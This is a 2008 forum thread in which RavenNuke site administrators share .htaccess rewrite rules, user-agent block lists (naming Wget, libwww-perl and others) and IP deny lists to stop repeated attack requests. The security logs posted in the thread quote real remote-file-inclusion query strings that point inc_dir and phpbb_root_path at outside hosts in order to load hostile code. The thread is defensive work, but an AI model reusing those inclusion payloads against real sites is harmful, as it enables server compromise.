Redirecting an annoyance.

Posted: Sat Feb 02, 2008 6:16 pm

I'm currently running RN 2.10.01. Lately (like for the past month), Nuke Sentinel has been blocking about a dozen Abuse-Filter (see below) attempts per day. They all contain TotalCalendar which is a module that I used to have but has been gone for several months. My concern is that whoever this is continues to permanently block IP on a variety of subnets. Is there any way to catch and redirect the URL via .htaccess before it hits Nuke Sentinel?

Thanks for considering the problem and helping me with the solution...

Here's the ban email:

Code:

Date &amp; Time: 2008-02-02 18:23:30 EST GMT -0500


Blocked IP: 71.192.149.*


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11


Query String: www.graciouscall.org/modules.php?name=TotalCalendar//modules/TotalCalendar/about.php?inc_dir=http://www.gilmores.ie/modules/di


Get String: www.graciouscall.org/modules.php?name=TotalCalendar//modules/TotalCalendar/about.php?inc_dir=http://www.gilmores.ie/modules/di


Post String: www.graciouscall.org/modules.php


Forwarded For: none


Client IP: none


Remote Address: 71.192.149.248


Remote Port: 63224


Request Method: GET


--------------------


Who-Is for IP

registered · Posted: Sat Feb 02, 2008 8:20 pm

While there are some more generic HTTP blocking one, here's a more specific one I us

Code:




RewriteCond %{THE_REQUEST}   (inc_dir)


RewriteRule ^.*$ http://127.0.0.1 [L]

Regular Joined: Apr 09, 2004 Posts: 87 Location: UK

Evaders, based a previous post here on another thread, I changed mine to the following :-

Code:







RewriteCond %{QUERY_STRING} \.ru





RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]





RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]





RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]





RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]





RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]





RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]





RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]





RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]





RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]





RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]





RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]





RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]





RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]





RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]





RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]





RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]





RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]





RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]





RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]





RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]





RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]





RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]





RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]





RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]





RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]





RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]





RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]





RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]





RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]





RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]





RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]





RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]





RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]





RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]





RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]





RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]





RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]





RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]





RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]





RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]





RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]





RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]





RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]





RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]





RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]





RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]





RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]





RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]





RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]





RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]





RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]





RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]





RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]





RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]





RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]





RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]





RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]





RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]





RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]





RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]





RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]





RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]





RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]





RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]





RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]





RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]





RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]





RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]





RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]





RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]





RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]





RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]





RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]





RewriteCond %{HTTP_USER_AGENT} ^Zeus [OR]





RewriteRule ^.*$ http://127.0.0.1 [R,L]











deny from 69.90.135


deny from 69.94.10


deny from 66.160.143


deny from 75.125.48


deny from 67.19.49


deny from 62.193.230


deny from 72.32.58


deny from 130.225.62


deny from 69.61.61


deny from 217.11.251


deny from 208.75.227


deny from 216.227.209


deny from 85.12.13


deny from 64.185.237


deny from 81.169.174


deny from 84.40.222


deny from 210.114.223


deny from 68.157.122


deny from 85.126.175


deny from 75.0.141


deny from 24.222.5


deny from 69.20.67


deny from 209.50.244


deny from 204.15.198


deny from 204.10.55


deny from 71.86.32


deny from 64.251.21


deny from 209.51.212


deny from 60.244.114

Despite this I am also getting at least a dozen similar "attacks" loading up my email inbox. Where would I place the code you suggest above and should I just use the one you posted or add it to mine above?

I really need to learn this htaccess thing. Rolling Eyes

Posted: Sun Feb 03, 2008 5:42 am

So, I assume that you place this at the top of the .htaccess in the root of the site, and it catches any incoming request having "inc_dir" - as this is a construct never used in RN. Very cool! Thanks!

Posted: Sun Feb 03, 2008 5:55 am

That works wonderfully! Thank you so much.
Taking a hint from an IBM support friend, I modified the code slightly:

Code:




RewriteCond %{THE_REQUEST}   (inc_dir)


RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]

registered · Posted: Sun Feb 03, 2008 7:26 am

sowsteady, do you have a RewriteEngine On statement?

Posted: Sun Feb 03, 2008 11:13 am

Gremmie wrote:

sowsteady, do you have a RewriteEngine On statement?

Oops! No I think, the one I posted above is exactly how I have it.

I guess I need to add "RewriteEngine On" at the beginning?

Posted: Sun Feb 03, 2008 9:43 pm

You can continue to add RewriteCond rules together. Just use the [OR] mark after the rule

Posted: Mon Feb 04, 2008 3:09 am

Evaders, thanks, so I ned to have something like ...

RewriteCond ON
RewriteCond %{QUERY_STRING} \.ru [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
...
..

Is this right?

Posted: Mon Feb 04, 2008 6:24 am

You want to turn the rewrite engine (mod_rewrite) on, and I've never seen NC,OR in rewrite conditions. I'd write it this way:

Code:

RewriteEngine ON


RewriteCond %{QUERY_STRING} \.ru [OR]


RewriteCond %{HTTP_USER_AGENT} ^Java [OR]


...


RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]

Posted: Mon Feb 04, 2008 7:29 am

webservant wrote:

You want to turn the rewrite engine (mod_rewrite) on, and I've never seen NC,OR in rewrite conditions. I'd write it this way:

Code:

RewriteEngine ON


RewriteCond %{QUERY_STRING} \.ru [OR]


RewriteCond %{HTTP_USER_AGENT} ^Java [OR]


...


RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]

webservant, thanks. I'm going to try it because whatever I have now definitely is not quite right.

Posted: Mon Feb 04, 2008 9:46 am

[NC] is just a tag meaning no case sensitivity. You can always include it to capture all case variations

Posted: Mon Feb 04, 2008 4:31 pm

Thanks for clearing my misperception.

Posted: Tue Feb 05, 2008 2:39 pm

I placed this in the htaccess but found server error in the who-is-where block.

webservant wrote:

I'd write it this way:

Code:

RewriteEngine ON


RewriteCond %{QUERY_STRING} \.ru [OR]


RewriteCond %{HTTP_USER_AGENT} ^Java [OR]


...


RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]

Regular Joined: Sep 12, 2003 Posts: 63

Hi. have problems with libwww-perl. In .htaccess I have this:

Code:

Options All -Indexes


DirectoryIndex index.php index.htm index.html





# -------------------------------------------


# Start of NukeSentinel(tm) admin.php Auth


# -------------------------------------------


<Files .ftaccess>


  deny from all


</Files>





<Files .staccess>


  deny from all


</Files>





# -----------------------------------------------------------------------------------------------------


# Leave this block commented out unless HTTPAuth is NOT available in your NukeSentinel(tm) Admin Panel.


# This code is mainly for use with CGI Authentication and most servers do not require it.


# -----------------------------------------------------------------------------------------------------


# <Files admin.php>


#    <Limit GET POST PUT>


#       require valid-user


#    </Limit>


#    AuthName "Restricted"


#    AuthType Basic


#   AuthUserFile /path/to/your/.staccess


# </Files>


# -----------------------------------------------------------------------------------------------------


# -----------------------------------------------------------------------------------------------------





RewriteEngine on 


RewriteCond %{QUERY_STRING} \.ru


RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]


RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]


RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]


RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]


RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]


RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]


RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]


RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]


RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]


RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]


RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]


RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]


RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]


RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]


RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]


RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]


RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]


RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]


RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]


RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]


RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]


RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]


RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]


RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]


RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]


RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]


RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]


RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]


RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]


RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]


RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]


RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]


RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]


RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]


RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]


RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]


RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]


RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]


RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]


RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]


RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]


RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]


RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]


RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]


RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]


RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]


RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]


RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]


RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]


RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]


RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]


RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]


RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]


RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]


RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]


RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]


RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]


RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]


RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]


RewriteCond %{HTTP_USER_AGENT} ^Zeus 


RewriteRule ^.*$ http://127.0.0.1 [R,L] 


RewriteEngine off





# -------------------------------------------


# Start of NukeSentinel(tm) DENY FROM area


# -------------------------------------------

But it seems that libwww-perl is not stopped by htaccess, because sentinel reports:

Code:

Date &amp; Time: 2008-02-07 03:48:07 CET GMT +0100


Blocked IP: 66.135.60.*


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: libwww-perl/5.79


Query String:


xxx.no/index.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt??


Get String:


xxx.no/index.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt??


Post String: xxx.no/index.php


Forwarded For: none


Client IP: none


Remote Address: 66.135.60.137


Remote Port: 51990


Request Method: GET


--------------------


Who-Is for IP

Do I have something wrong in my htaccess file?

regards fondy

registered · Posted: Thu Feb 07, 2008 7:05 am

Your first RewriteCond line doesn't have the [OR] in it... Wink

Posted: Thu Feb 07, 2008 7:14 am

Thx montego, I will change it and try Smile

Posted: Tue Feb 19, 2008 2:30 am

Hi

Instead of using rewrite to block, can this be an idea to include in htaccess :

Code:

SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot


SetEnvIfNoCase User-Agent "^Baiduspider" bad_bot


SetEnvIfNoCase User-Agent "^BatchFTP" bad_bot


SetEnvIfNoCase User-Agent "^Bigfoot" bad_bot


SetEnvIfNoCase User-Agent "^Black.Hole" bad_bot


 


Order Allow,Deny


Allow from All


Deny from env=bad_bot

I have trouble with the the libwww-perl user agent, because it is not stopped in htaccess. Have these in htaccess:

Code:

Options All -Indexes


DirectoryIndex index.php index.htm index.html





# -------------------------------------------


# Start of NukeSentinel(tm) admin.php Auth


# -------------------------------------------


<Files .ftaccess>


  deny from all


</Files>





<Files .staccess>


  deny from all


</Files>





# -----------------------------------------------------------------------------------------------------


# Leave this block commented out unless HTTPAuth is NOT available in your NukeSentinel(tm) Admin Panel.


# This code is mainly for use with CGI Authentication and most servers do not require it.


# -----------------------------------------------------------------------------------------------------


# <Files admin.php>


#    <Limit GET POST PUT>


#       require valid-user


#    </Limit>


#    AuthName "Restricted"


#    AuthType Basic


#   AuthUserFile /path/to/your/.staccess


# </Files>


# -----------------------------------------------------------------------------------------------------


# -----------------------------------------------------------------------------------------------------


RewriteEngine ON


RewriteCond %{QUERY_STRING} \.ru [OR]


RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]


RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]


RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]


RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]


RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]


RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]


RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]


RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]


RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]


RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]


RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]


RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]


RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]


RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]


RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]


RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]


RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]


RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]


RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]


RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]


RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]


RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]


RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]


RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]


RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]


RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]


RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]


RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]


RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]


RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]


RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]


RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]


RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]


RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]


RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]


RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]


RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]


RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]


RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]


RewriteCond %{HTTP_USER_AGENT} ^Opera [NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]


RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]


RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]


RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]


RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]


RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]


RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]


RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]


RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]


RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]


RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]


RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]


RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]


RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]


RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]


RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]


RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]


RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]


RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]


RewriteCond %{HTTP_USER_AGENT} ^wget [OR]


RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]


RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]


RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]


RewriteCond %{HTTP_USER_AGENT} ^Zeus 


RewriteRule ^.*$ http://127.0.0.1 [R,L] 


RewriteEngine OFF





# -------------------------------------------


# Start of NukeSentinel(tm) DENY FROM area


# -------------------------------------------

regards fondy

Posted: Thu Feb 21, 2008 4:16 am

If ModRewrite is not available, use this:

Code:

SetEnvIfNoCase user-agent "^Java" bad_bot


SetEnvIfNoCase user-agent "^LWP" bad_bot


SetEnvIfNoCase user-agent "^lwp-trivial" bad_bot


SetEnvIfNoCase user-agent "^libwww-perl" bad_bot


SetEnvIfNoCase user-agent "^NaverBot" bad_bot


SetEnvIfNoCase user-agent "^Twiceler" bad_bot


SetEnvIfNoCase user-agent "^Yeti" bad_bot


SetEnvIfNoCase user-agent "^BlackWidow" bad_bot


SetEnvIfNoCase user-agent "^Bot\ mailto:craftbot@yahoo.com" bad_bot


SetEnvIfNoCase user-agent "^ChinaClaw" bad_bot


SetEnvIfNoCase user-agent "^Custo" bad_bot


SetEnvIfNoCase user-agent "^DISCo" bad_bot


SetEnvIfNoCase user-agent "^Download\ Demon" bad_bot


SetEnvIfNoCase user-agent "^eCatch" bad_bot


SetEnvIfNoCase user-agent "^EirGrabber" bad_bot


SetEnvIfNoCase user-agent "^EmailSiphon" bad_bot


SetEnvIfNoCase user-agent "^EmailWolf" bad_bot


SetEnvIfNoCase user-agent "^Express\ WebPictures" bad_bot


SetEnvIfNoCase user-agent "^ExtractorPro" bad_bot


SetEnvIfNoCase user-agent "^EyeNetIE" bad_bot


SetEnvIfNoCase user-agent "^FlashGet" bad_bot


SetEnvIfNoCase user-agent "^GetRight" bad_bot


SetEnvIfNoCase user-agent "^GetWeb!" bad_bot


SetEnvIfNoCase user-agent "^Go!Zilla" bad_bot


SetEnvIfNoCase user-agent "^Go-Ahead-Got-It" bad_bot


SetEnvIfNoCase user-agent "^GrabNet" bad_bot


SetEnvIfNoCase user-agent "^Grafula" bad_bot


SetEnvIfNoCase user-agent "^HMView" bad_bot


SetEnvIfNoCase user-agent "HTTrack" bad_bot


SetEnvIfNoCase user-agent "^Image\ Stripper" bad_bot


SetEnvIfNoCase user-agent "^Image\ Sucker" bad_bot


SetEnvIfNoCase user-agent "Indy\ Library" bad_bot


SetEnvIfNoCase user-agent "^InterGET" bad_bot


SetEnvIfNoCase user-agent "^Internet\ Ninja" bad_bot


SetEnvIfNoCase user-agent "^JetCar" bad_bot


SetEnvIfNoCase user-agent "^JOC\ Web\ Spider" bad_bot


SetEnvIfNoCase user-agent "^larbin" bad_bot


SetEnvIfNoCase user-agent "^LeechFTP" bad_bot


SetEnvIfNoCase user-agent "^Mass\ Downloader" bad_bot


SetEnvIfNoCase user-agent "^MIDown\ tool" bad_bot


SetEnvIfNoCase user-agent "^Mister\ PiX" bad_bot


SetEnvIfNoCase user-agent "^Navroad" bad_bot


SetEnvIfNoCase user-agent "^NearSite" bad_bot


SetEnvIfNoCase user-agent "^NetAnts" bad_bot


SetEnvIfNoCase user-agent "^NetSpider" bad_bot


SetEnvIfNoCase user-agent "^Net\ Vampire" bad_bot


SetEnvIfNoCase user-agent "^NetZIP" bad_bot


SetEnvIfNoCase user-agent "^Octopus" bad_bot


SetEnvIfNoCase user-agent "^Offline\ Explorer" bad_bot


SetEnvIfNoCase user-agent "^Offline\ Navigator" bad_bot


SetEnvIfNoCase user-agent "^Opera" bad_bot


SetEnvIfNoCase user-agent "^PageGrabber" bad_bot


SetEnvIfNoCase user-agent "^Papa\ Foto" bad_bot


SetEnvIfNoCase user-agent "^pavuk" bad_bot


SetEnvIfNoCase user-agent "^pcBrowser" bad_bot


SetEnvIfNoCase user-agent "^RealDownload" bad_bot


SetEnvIfNoCase user-agent "^ReGet" bad_bot


SetEnvIfNoCase user-agent "^SiteSnagger" bad_bot


SetEnvIfNoCase user-agent "^SmartDownload" bad_bot


SetEnvIfNoCase user-agent "^SuperBot" bad_bot


SetEnvIfNoCase user-agent "^SuperHTTP" bad_bot


SetEnvIfNoCase user-agent "^Surfbot" bad_bot


SetEnvIfNoCase user-agent "^tAkeOut" bad_bot


SetEnvIfNoCase user-agent "^Teleport\ Pro" bad_bot


SetEnvIfNoCase user-agent "^VoidEYE" bad_bot


SetEnvIfNoCase user-agent "^Web\ Image\ Collector" bad_bot


SetEnvIfNoCase user-agent "^Web\ Sucker" bad_bot


SetEnvIfNoCase user-agent "^WebAuto" bad_bot


SetEnvIfNoCase user-agent "^WebCopier" bad_bot


SetEnvIfNoCase user-agent "^WebFetch" bad_bot


SetEnvIfNoCase user-agent "^WebGo\ IS" bad_bot


SetEnvIfNoCase user-agent "^WebLeacher" bad_bot


SetEnvIfNoCase user-agent "^WebReaper" bad_bot


